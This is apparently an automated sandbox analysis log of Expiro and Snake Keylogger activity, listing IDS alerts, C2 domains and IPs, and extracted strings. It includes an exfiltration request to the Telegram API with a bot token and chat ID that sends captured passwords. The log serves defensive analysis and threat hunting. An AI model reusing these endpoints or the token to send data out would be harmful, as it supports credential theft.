                  Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.5:58130 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.5:49707 -> 18.141.10.107:80
                  Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.5:63116 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.5:49792 -> 82.112.184.197:80
                  Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49716 -> 149.154.167.220:443
                  Uses the Telegram API (likely for C&C communication)
                  Source: unknownDNS query: name: api.telegram.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendDocument?chat_id=1613755033&caption=user%20/%20Passwords%20/%208.46.123.175 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd19939553a042Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 13.248.148.254 13.248.148.254
                  Source: Joe Sandbox ViewIP Address: 13.248.148.254 13.248.148.254
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 44.221.84.105 44.221.84.105
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.5:49706
                  Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.5:49706
                  Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.5:49708
                  Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.5:49708
                  Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.5:49710
                  Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.5:49710
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49709 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.5:49946
                  Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.5:49946
                  Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.5:49952
                  Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.5:49952
                  Source: global trafficHTTP traffic detected: POST /ihnlsqbtrmkahnv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /taohikdratudiqxk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 892
                  Source: global trafficHTTP traffic detected: POST /jji HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /xxitmchctwqm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 892
                  Source: global trafficHTTP traffic detected: POST /yfypviummaqwyuq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /gjuvotllw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: POST /iwsxa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: GET /iwsxa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww99.przvgke.biz
                  Source: global trafficHTTP traffic detected: GET /iwsxa?usid=25&utid=8132645662 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: POST /snsobwmcccpnrm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: GET /snsobwmcccpnrm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww99.przvgke.biz
                  Source: global trafficHTTP traffic detected: GET /snsobwmcccpnrm?usid=25&utid=8132647334 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
                  Source: global trafficHTTP traffic detected: POST /feiwbqpqckjc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /dtxqcr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /kdexhblwxghmj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /cfsmnhjm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /o HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /vtfq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /pn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /eglmpsrvxnyx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: global trafficHTTP traffic detected: POST /lqpvpf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
                  Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49711 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET /iwsxa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww99.przvgke.biz
                  Source: global trafficHTTP traffic detected: GET /iwsxa?usid=25&utid=8132645662 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET /snsobwmcccpnrm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww99.przvgke.biz
                  Source: global trafficHTTP traffic detected: GET /snsobwmcccpnrm?usid=25&utid=8132647334 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
                  Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
                  Source: global trafficDNS traffic detected: DNS query: ssbzmoy.biz
                  Source: global trafficDNS traffic detected: DNS query: cvgrf.biz
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: npukfztj.biz
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: przvgke.biz
                  Source: global trafficDNS traffic detected: DNS query: ww99.przvgke.biz
                  Source: global trafficDNS traffic detected: DNS query: ww12.przvgke.biz
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficDNS traffic detected: DNS query: zlenh.biz
                  Source: global trafficDNS traffic detected: DNS query: knjghuig.biz
                  Source: global trafficDNS traffic detected: DNS query: uhxqin.biz
                  Source: global trafficDNS traffic detected: DNS query: anpmnmxo.biz
                  Source: global trafficDNS traffic detected: DNS query: lpuegx.biz
                  Source: global trafficDNS traffic detected: DNS query: vjaxhpbji.biz
                  Source: global trafficDNS traffic detected: DNS query: xlfhhhm.biz
                  Source: global trafficDNS traffic detected: DNS query: ifsaia.biz
                  Source: global trafficDNS traffic detected: DNS query: saytjshyf.biz
                  Source: global trafficDNS traffic detected: DNS query: vcddkls.biz
                  Source: global trafficDNS traffic detected: DNS query: fwiwk.biz
                  Source: unknownHTTP traffic detected: POST /bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendDocument?chat_id=1613755033&caption=user%20/%20Passwords%20/%208.46.123.175 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd19939553a042Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
                  Source: officesvcmgr.exe.2.drString found in binary or memory: http://127.0.0.1:13556/HttpLogWriterEndpointInsiderSlabBehaviorInsiderSlabBehaviorReportedStateInsid
                  Source: armsvc.exe, 00000002.00000003.2288760056.0000000000974000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/C
                  Source: armsvc.exe, 00000002.00000003.2288760056.0000000000974000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/J
                  Source: armsvc.exe, 00000002.00000003.2288760056.0000000000974000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/U
                  Source: armsvc.exe, 00000002.00000003.2288760056.0000000000974000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/snsobwmcccpnrm
                  Source: armsvc.exe, 00000002.00000003.2148425780.0000000000974000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2329946680.0000000000974000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/
                  Source: armsvc.exe, 00000002.00000003.2329946680.0000000000974000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/4
                  Source: armsvc.exe, 00000002.00000003.2329946680.0000000000974000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/b
                  Source: armsvc.exe, 00000002.00000003.2329946680.0000000000974000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/feiwbqpqckjc
                  Source: armsvc.exe, 00000002.00000003.2148425780.0000000000974000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/jji
                  Source: armsvc.exe, 00000002.00000003.2187672356.0000000000974000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/b
                  Source: armsvc.exe, 00000002.00000003.2187355202.000000000098F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/gjuvotllw
                  Source: armsvc.exe, 00000002.00000003.2169195097.0000000000974000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2121242786.0000000000974000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2187672356.0000000000974000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/
                  Source: armsvc.exe, 00000002.00000003.2121150907.0000000000984000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2121242786.0000000000974000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/ihnlsqbtrmkahnv
                  Source: armsvc.exe, 00000002.00000003.2169195097.0000000000974000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/yfypviummaqwyuq
                  Source: armsvc.exe, 00000002.00000003.2169195097.0000000000989000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/yfypviummaqwyuq
                  Source: armsvc.exe, 00000002.00000003.2690542196.0000000000974000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2555725636.0000000000974000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2690542196.0000000000982000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2787944261.0000000000984000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/
                  Source: armsvc.exe, 00000002.00000003.2690542196.0000000000974000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/U
                  Source: armsvc.exe, 00000002.00000003.2555995836.000000000098F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/dtxqcr
                  Source: armsvc.exe, 00000002.00000003.2690542196.0000000000974000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/kdexhblwxghmj
                  Source: armsvc.exe, 00000002.00000003.2690104496.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2689707776.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/kdexhblwxghmjgif
                  Source: RegSvcs.exe, 00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                  Source: RegSvcs.exe, 00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: RegSvcs.exe, 00000011.00000002.3380159600.0000000003321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: RegSvcs.exe, 00000011.00000002.3338405764.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: armsvc.exe, 00000002.00000003.2148708963.000000000098F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2149018044.0000000000998000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2121150907.000000000098F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pywolwnvd.biz/
                  Source: AppVClient.exe, 00000007.00000003.2109262975.00000000004DD000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.2109012837.00000000004D6000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.2109493299.00000000004E5000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000002.2110084231.00000000004F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.micrXX
                  Source: RegSvcs.exe, 00000011.00000002.3380159600.0000000003321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: armsvc.exe, 00000002.00000003.2290002010.000000000098F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.biz/
                  Source: armsvc.exe, 00000002.00000003.2256408512.0000000002350000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTZ8fHx8fHw2NzU5NGNhZTNm
                  Source: armsvc.exe, 00000002.00000003.2279896639.0000000002390000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTd8fHx8fHw2NzU5NGNiMGMw
                  Source: armsvc.exe, 00000002.00000003.2290002010.000000000098F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.biz/L
                  Source: armsvc.exe, 00000002.00000003.2331664553.000000000099F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2290002010.000000000098F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2331182641.000000000098F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.biz/T
                  Source: armsvc.exe, 00000002.00000003.2290002010.000000000098F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.biz/d
                  Source: armsvc.exe, 00000002.00000003.2331664553.000000000099F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2290002010.000000000098F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2288760056.0000000000982000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2290002010.0000000000984000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2787409878.00000000009A5000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2786700530.00000000009A3000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2690104496.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2689707776.00000000009A3000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2555537491.000000000099F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2331182641.000000000098F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.biz/iwsxa?usid=25&utid=8132645662
                  Source: armsvc.exe, 00000002.00000003.2288760056.0000000000982000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2290002010.0000000000984000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.biz/iwsxa?usid=25&utid=8132645662ww99.przvgke.bizc
                  Source: armsvc.exe, 00000002.00000003.2331664553.000000000099F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2290002010.000000000098F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2787409878.00000000009A5000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2786700530.00000000009A3000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2690104496.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2689707776.00000000009A3000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2555537491.000000000099F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2331182641.000000000098F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.biz/snsobwmcccpnrm?usid=25&utid=8132647334
                  Source: armsvc.exe, 00000002.00000003.2290002010.000000000098F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww99.przvgke.biz/
